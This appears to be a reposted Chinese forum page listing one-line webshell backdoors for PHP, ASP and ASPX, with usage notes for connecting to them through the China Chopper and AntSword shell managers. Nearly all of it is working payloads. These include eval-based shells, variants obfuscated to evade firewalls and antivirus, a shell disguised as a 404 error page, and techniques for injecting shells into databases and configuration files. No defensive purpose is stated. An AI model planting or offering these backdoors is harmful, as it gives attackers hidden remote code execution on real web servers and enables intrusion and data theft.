1、普通一句話:
|
1
2
3
|
<?php
@
eval
($_POST[123456]);
?>
|
*post后面中括號里面的內容是使用菜刀或蟻劍連接時的密碼
2、防爆破一句話:
|
1
2
3
4
|
<?php
substr(md5($_REQUEST[
'x'
]),28)==
'6862'
&&
eval
($_REQUEST[
'password'
]);
?>
*菜刀地址http:
//192
.168.64.137
/x
.php?x=myh0st
|
3、過狗一句話:
|
1
2
3
4
5
|
<?php
($_=@$_GET[s]).@$_($_POST[hihack])
?>
//
菜刀地址 http:
//localhost/1
.php?s=assert
<php $a =
"a"
.
"s"
.
"s"
.
"e"
.
"r"
.
"t"
; $a($_POST[hihack]);
?>
|
4、404隱藏的一句話:
|
1
2
3
4
5
6
7
8
9
10
|
<!DOCTYPE HTML PUBLIC
"-//IETF//DTD HTML 2.0//EN"
>
<html><
head
>
<title>404 Not Found<
/title
>
<
/head
><body>
<h1>Not Found<
/h1
>
<p>The requested URL
/error
.php was not found on this server. <
/p
>
<
/body
><
/html
>
<?php
@preg_replace(
"/[checksql]/e"
,$_POST[
'hihack'
],
"saft"
);
?>
|
菜刀連接時在配置欄添加:
|
1
|
<O>
date
=@
eval
($_POST[paxmac]);<
/O
>
|
5、不用問號(?)的一句話:
|
1
|
<script language=
"php"
>
eval
($_POST[hihack]);<
/script
>
|
6、躲避檢測:
|
1
|
<?php assert($_REQUEST[
"hihack"
]);?>
|
7、變形一句話后門:
|
1
|
訪問該網頁,然后菜刀連接:
/myh0st
.php 密碼:hihack
|
ASP一句話:
1、普通一句話:
|
1
|
<%
eval
request(
"hihack"
)%>或<%execute(request(
"hihack"
))%>
|
2、unicode編碼的access木馬 :
|
1
|
向access數據庫插入 ┼攠數畣整爠煥敵瑳∨≡┩> 編碼前:<% execute request(
"a"
)%>
|
然后備份出webshell,密碼a
3、配置文件插馬(需要條件支持,插入的數據被寫在了配置文件中):
|
1
|
插入:
"%><% bbbb=request("
aaaa")%><%eval(bbbb)%><%'
|
訪問報錯,獲取到配置文件的地址,然后連接,密碼aaaa
4、不用%的一句話:
|
1
|
<script language=VBScript runat=server>execute request(
"hihack"
)</script>
|
5、不用雙引號(“)的一句話:
|
1
|
<%
eval
request(chr(35))%> 密碼:
#
|
ASPX一句話:
1、普通一句話:
|
1
|
<%@ Page Language=”Jscript”%> <%eval(Request.Item[“hihack”],”unsafe”);%>
|
2、免殺一句話:
|
1
|
<%@PAGE LANGUAGE=JSCRIPT%><%
var
PAY:String=Request[“x61x62x63x64”];eval(PAY,”x75x6Ex73x61”+”x66x65”);%>
|
轉自http://bbs.tiger2019.cn/?thread-187.htm
